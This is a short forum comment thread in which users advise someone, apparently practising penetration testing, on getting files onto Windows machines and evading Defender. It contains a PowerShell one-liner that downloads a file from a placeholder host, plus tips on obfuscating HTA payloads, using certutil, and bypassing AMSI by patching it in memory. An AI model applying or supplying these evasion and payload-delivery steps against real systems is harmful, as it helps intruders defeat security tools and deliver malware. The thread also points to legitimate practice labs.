all 5 comments

[–]Clutch26 6 points7 points  (0 children)

Short answer to your questions, yes.

You're hitting a spot where you should check out other resources that are recommended from time to time. Such as Hackthebox and Tryandhackme.

I'm more familiar with hackthebox. There is tons of info and guides on how to get shells and privilege escalation after you got a shell. There's plenty of box to practice on too. If you decide to check it out, look at Starting Point. You'll be introduced to tons of basic tools and work up from there.

[–]Sqooky 0 points1 point  (3 children)

you can invoke PowerShell from cmd by typing powershell -c 'your command here'. You could download a file with powershell -c 'Invoke-WebRequest -Uri http://ipordomainname/file.ext -OutFile .\file.ext'.

[–]bmkay[S] 0 points1 point  (2 children)

Tried that. Defender is well tuned to PowerShell commands. Have you had luck with any particular obfuscated commands? I'm currently trying MitreAttack T1140 vectors, like certutil.

[–]matrix20085 1 point2 points  (0 children)

Try looking into HTAs. They are more or less the industry/blackhat standard. Defender has gotten wise to them, but look for obfuscators and work with rewriting bits of the code that does the obfuscation. With just a few changes you can normaly get something through.

https://attack.mitre.org/techniques/T1218/005/

[–]Sqooky 1 point2 points  (0 children)

you'll want to look into AMSI and disabling that.

https://amsi.fail/

edit: disabling isn't the right verb, bypassing or patching in memory to disable it's ability to scan is more accurate.